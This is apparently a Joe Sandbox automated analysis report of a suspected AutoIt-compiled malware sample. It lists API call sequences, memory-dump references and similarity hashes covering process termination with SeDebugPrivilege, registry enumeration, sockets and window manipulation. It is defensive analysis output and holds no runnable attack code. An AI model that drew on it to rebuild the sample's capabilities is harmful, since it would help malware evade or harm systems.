• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00591CD9,?,?,00000000), ref: 005920D3
• GetCurrentProcess.KERNEL32(00591CD9,00000000,?,00591CD9,?,?,00000000), ref: 005920DB
• DuplicateHandle.KERNEL32(00000000,?,00591CD9,?,?,00000000), ref: 005920DE
• CreateThread.KERNEL32(00000000,00000000,00592104,00000000,00000000,00000000), ref: 005920F8
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: beb3c083bc072eb5250320cf558846c29467c7e9b93a7b436b16d46ad3bbd7d6
• Instruction ID: a7e3e68b4c160a1ac79952087fc6463f96760a09ed714b1c195d911656a3802c
• Opcode Fuzzy Hash: beb3c083bc072eb5250320cf558846c29467c7e9b93a7b436b16d46ad3bbd7d6
• Instruction Fuzzy Hash: 2101FBB5240708BFE710ABA5DC4DF6B3BBCEB98710F054420FA04DB1A1CA719804DB30
APIs
  • Part of subcall function 00534154: _wcslen.LIBCMT ref: 00534159
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0059CEAE
• _wcslen.LIBCMT ref: 0059CEF5
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0059CF5C
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0059CF8A
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: 0$pb$pb
• API String ID: 1227352736-318905209
• Opcode ID: 4bef5a29849f59b46657b19d3f8d3ddc2752f5f16551bc4b6115a91982f7dfc4
• Instruction ID: 62c347d1a6b41315a8418ba56eca5f2a33a5ece4cf04bb6d8c05275d59caeb02
• Opcode Fuzzy Hash: 4bef5a29849f59b46657b19d3f8d3ddc2752f5f16551bc4b6115a91982f7dfc4
• Instruction Fuzzy Hash: ED51DD716043029FDB159F28C888B6BBFE9BF89354F040A2EF995D62E0DB70C944CB52
APIs
  • Part of subcall function 0059DC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 0059DCC1
  • Part of subcall function 0059DC9C: Process32FirstW.KERNEL32(00000000,?), ref: 0059DCCF
  • Part of subcall function 0059DC9C: CloseHandle.KERNELBASE(00000000), ref: 0059DD9C
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 005BAACC
• GetLastError.KERNEL32 ref: 005BAADF
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 005BAB12
• TerminateProcess.KERNEL32(00000000,00000000), ref: 005BABC7
• GetLastError.KERNEL32(00000000), ref: 005BABD2
• CloseHandle.KERNEL32(00000000), ref: 005BAC23
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
• Opcode ID: 71da8a7f4f67976a99b8a367aa9af056579477ba10fe3fe4b069753e1766f08e
• Instruction ID: 6409151897701bd0a7993a153607765dcb91bfad086f04a55cffc8b30428d5e3
• Opcode Fuzzy Hash: 71da8a7f4f67976a99b8a367aa9af056579477ba10fe3fe4b069753e1766f08e
• Instruction Fuzzy Hash: 17618D70208642AFD720DF18C499F56BFE1BF54318F18849CE4668B7A2C775ED4ACB92
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 005C4284
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 005C4299
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 005C42B3
• _wcslen.LIBCMT ref: 005C42F8
• SendMessageW.USER32(?,00001057,00000000,?), ref: 005C4325
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 005C4353
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: MessageSend$Window_wcslen
• String ID: SysListView32
• API String ID: 2147712094-78025650
• Opcode ID: 86df862ae75671ad4ba6571139e72a2f44d5087317b72c9e33fd081985535834
• Instruction ID: 270fc11425803ada784010cb0e21c181a819651e3eacff8e748c7aec897ca116
• Opcode Fuzzy Hash: 86df862ae75671ad4ba6571139e72a2f44d5087317b72c9e33fd081985535834
• Instruction Fuzzy Hash: 1641AC35A00209AFDB219FA4CC49FEA7BB9FF48360F10052AF954E7291D7749984CFA0
APIs
• ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0058FB8F,00000000,?,?,00000000,?,005739BC,00000004,00000000,00000000), ref: 005C8BAB
• EnableWindow.USER32(?,00000000), ref: 005C8BD1
• ShowWindow.USER32(FFFFFFFF,00000000), ref: 005C8C30
• ShowWindow.USER32(?,00000004), ref: 005C8C44
• EnableWindow.USER32(?,00000001), ref: 005C8C6A
• SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 005C8C8E (0x130C = TCM_SETCURSEL, selecting a tab in a tab control)
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID: Hb
• API String ID: 642888154-1270690246
• Opcode ID: f97ccaa02ba6b2682c0c6166a2c42774172d0b951f5a101ac5d93ff57f246956
• Instruction ID: 00a0412a93908aad2bb961dd09126cbbafc1b52140a05fdfec1e18eb15befc2d
• Opcode Fuzzy Hash: f97ccaa02ba6b2682c0c6166a2c42774172d0b951f5a101ac5d93ff57f246956
• Instruction Fuzzy Hash: C2414E74601645AFDB15CF64C899FB57FF1FB49308F1851A9E6088B2A2CB35AC45CB50
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 642191829-3771769585
• Opcode ID: b2995595d0631d659c202b8c9fab20cc599eef6b07b8dc2618994a2f94291c30
• Instruction ID: 3322fe342631b2828fe1cace19ed2d0666c4fe682a08d06004ab526617ef4214
• Opcode Fuzzy Hash: b2995595d0631d659c202b8c9fab20cc599eef6b07b8dc2618994a2f94291c30
• Instruction Fuzzy Hash: AB11D2319002166FDB24AB60DC4FEDA7FBCFF94711F10006AF945D2091EB748A85AA61
APIs
• VariantInit.OLEAUT32(?), ref: 005B42C8
• CharUpperBuffW.USER32(?,?), ref: 005B43D7
• _wcslen.LIBCMT ref: 005B43E7
• VariantClear.OLEAUT32(?), ref: 005B457C
  • Part of subcall function 005A15B3: VariantInit.OLEAUT32(00000000), ref: 005A15F3
  • Part of subcall function 005A15B3: VariantCopy.OLEAUT32(?,?), ref: 005A15FC
  • Part of subcall function 005A15B3: VariantClear.OLEAUT32(?), ref: 005A1608
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
• Opcode ID: c7707bc337e2d3d4167f2458131f841c0207e527da2af68ac97c77005e931e49
• Instruction ID: d1903b2f36a31766bd868542cd4622687b07bf727daf158b78fe44cf45016862
• Opcode Fuzzy Hash: c7707bc337e2d3d4167f2458131f841c0207e527da2af68ac97c77005e931e49
• Instruction Fuzzy Hash: 679147746087029FCB14DF28C48596ABBE5BF88314F14882DF88A9B352DB31ED46CF52
APIs
• GetMenu.USER32(?), ref: 005C2AE2
• GetMenuItemCount.USER32(00000000), ref: 005C2B14
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005C2B3C
• _wcslen.LIBCMT ref: 005C2B72
• GetMenuItemID.USER32(?,?), ref: 005C2BAC
• GetSubMenu.USER32(?,?), ref: 005C2BBA
  • Part of subcall function 005942CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005942E6
  • Part of subcall function 005942CC: GetCurrentThreadId.KERNEL32 ref: 005942ED
  • Part of subcall function 005942CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00592E43), ref: 005942F4
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005C2C42 (0x111 = WM_COMMAND, i.e. the menu item is activated by posting a command to the target window)
  • Part of subcall function 0059F1A7: Sleep.KERNEL32 ref: 0059F21F
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
• Opcode ID: 49989ae293cac3e15ea501c938e2878c7da6e234def88c3135b660551ae11fc0
• Instruction ID: 406eace05ada084a92292e1dea7753bed8279834b97ced5229e58da3bc7eaabe
• Opcode Fuzzy Hash: 49989ae293cac3e15ea501c938e2878c7da6e234def88c3135b660551ae11fc0
• Instruction Fuzzy Hash: 80715B75A00205AFCB14EFA4C885EAEBBB5FF88310F14846DE816EB251DB74ED41DB90
APIs
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005C4794
• IsMenu.USER32(?), ref: 005C47A9
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005C47F1
• DrawMenuBar.USER32 ref: 005C4804
Strings
Memory Dump Source
• Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
• Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert
• String ID: 0$Hb
• API String ID: 3076010158-615381975
• Opcode ID: 40f275fdd11b515fa6a30151941adc5fb329220b519773a57615d7b4ee1d59d6
• Instruction ID: 9a4d18533daf69b5e3c302b97fee81d72fb98c1619aa63ffe191770f248d4881
• Opcode Fuzzy Hash: 40f275fdd11b515fa6a30151941adc5fb329220b519773a57615d7b4ee1d59d6
• Instruction Fuzzy Hash: B4411375A01249AFDB20CFA4D8A4EAABBB9FF49354F048129E905AB250C730ED55DF60
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005980D1
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005980F7
                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 005980FA
                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 0059811B
                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00598124
                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0059813E
                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0059814C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 005A0DAE
                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005A0DEA
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                      • String ID: nul
                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                      APIs
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 005A0E82
                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005A0EBD
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                      • String ID: nul
                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00537759
                                                                                                                                                        • Part of subcall function 0053771B: GetStockObject.GDI32(00000011), ref: 0053776D
                                                                                                                                                        • Part of subcall function 0053771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00537777
                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 005C4A71
                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 005C4A7E
                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 005C4A89
                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 005C4A98
                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 005C4AA4
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0059E23D
                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 0059E244
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0059E25A
                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 0059E261
                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0059E2A5
                                                                                                                                                      Strings
                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0059E282
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                                                                      APIs
                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005B271D
                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005B273E
                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 005B274F
                                                                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 005B2838
                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 005B27E9
                                                                                                                                                        • Part of subcall function 00594277: _strlen.LIBCMT ref: 00594281
                                                                                                                                                        • Part of subcall function 005B3B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,005AF569), ref: 005B3B9D
                                                                                                                                                      • _strlen.LIBCMT ref: 005B2892
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3203458085-0
                                                                                                                                                      APIs
                                                                                                                                                      • __allrem.LIBCMT ref: 0056044A
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00560466
                                                                                                                                                      • __allrem.LIBCMT ref: 0056047D
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0056049B
                                                                                                                                                      • __allrem.LIBCMT ref: 005604B2
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 005604D0
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                      • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                                                                                      • Instruction ID: f2c08de3c6c651161fd992867b3341d3fbdbadb0a044a67272358fb09b3d6915
                                                                                                                                                      • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                                                                                                                                      • Instruction Fuzzy Hash: AC81F6726007069BEB249E69CC85B6B7BE8FF90365F24992AF611D73C1EB70D940CB50
                                                                                                                                                      APIs
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00558669,00558669,?,?,?,005667DF,00000001,00000001,8BE85006), ref: 005665E8
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005667DF,00000001,00000001,8BE85006,?,?,?), ref: 0056666E
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00566768
                                                                                                                                                      • __freea.LIBCMT ref: 00566775
                                                                                                                                                        • Part of subcall function 00563BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00556A99,?,0000015D,?,?,?,?,005585D0,000000FF,00000000,?,?), ref: 00563BE2
                                                                                                                                                      • __freea.LIBCMT ref: 0056677E
                                                                                                                                                      • __freea.LIBCMT ref: 005667A3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1414292761-0
                                                                                                                                                      • Opcode ID: 9a804cab1e63e3a6d4e5a72f5ae206b7ab4357bb2a4553470c12abdae5c69a10
                                                                                                                                                      • Instruction ID: 09cb3076651e4bebacc084e802804d34610c0d8ff97f3bd3d6b7d45efe477d4a
                                                                                                                                                      • Opcode Fuzzy Hash: 9a804cab1e63e3a6d4e5a72f5ae206b7ab4357bb2a4553470c12abdae5c69a10
                                                                                                                                                      • Instruction Fuzzy Hash: 1651D072600216AFEB258F64CC86EBB7FAAFB84754F194628FC05D7150EB34EC44D6A0
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 005BD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005BC00D,?,?), ref: 005BD314
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD350
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3C7
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3FD
                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BC629
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005BC684
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005BC6C9
                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005BC6F8
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005BC752
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 005BC75E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1120388591-0
                                                                                                                                                      • Opcode ID: 880e8a68d15389dec31db2455d9d830276e211c77937d088c92da2e3ee0827e1
                                                                                                                                                      • Instruction ID: 7cee571cab85743f6327aee41eb7378b9c19e31bdebc551ccb819eadb1d909a5
                                                                                                                                                      • Opcode Fuzzy Hash: 880e8a68d15389dec31db2455d9d830276e211c77937d088c92da2e3ee0827e1
                                                                                                                                                      • Instruction Fuzzy Hash: 92816C71208241AFD714DF24C895E6ABFE5FF84308F1489ACF5568B2A2DB31ED45CB92
                                                                                                                                                      APIs
                                                                                                                                                      • VariantInit.OLEAUT32(00000035), ref: 00590049
                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 005900F0
                                                                                                                                                      • VariantCopy.OLEAUT32(005902F4,00000000), ref: 00590119
                                                                                                                                                      • VariantClear.OLEAUT32(005902F4), ref: 0059013D
                                                                                                                                                      • VariantCopy.OLEAUT32(005902F4,00000000), ref: 00590141
                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0059014B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3859894641-0
                                                                                                                                                      • Opcode ID: a46ddd9552166e653b9c3d2d30883fe53a80e7b7035a2790762c6001b295d6e4
                                                                                                                                                      • Instruction ID: b8afc881bf50e0aa4d8dd983a45141843a4ea91d46e064bdc9f0361e4e86c7c2
                                                                                                                                                      • Opcode Fuzzy Hash: a46ddd9552166e653b9c3d2d30883fe53a80e7b7035a2790762c6001b295d6e4
                                                                                                                                                      • Instruction Fuzzy Hash: 6151F535600301AECF24AB64DC99B29BBA8FF95710F14AC47E906DF2D6DB709C44DB52
                                                                                                                                                      APIs
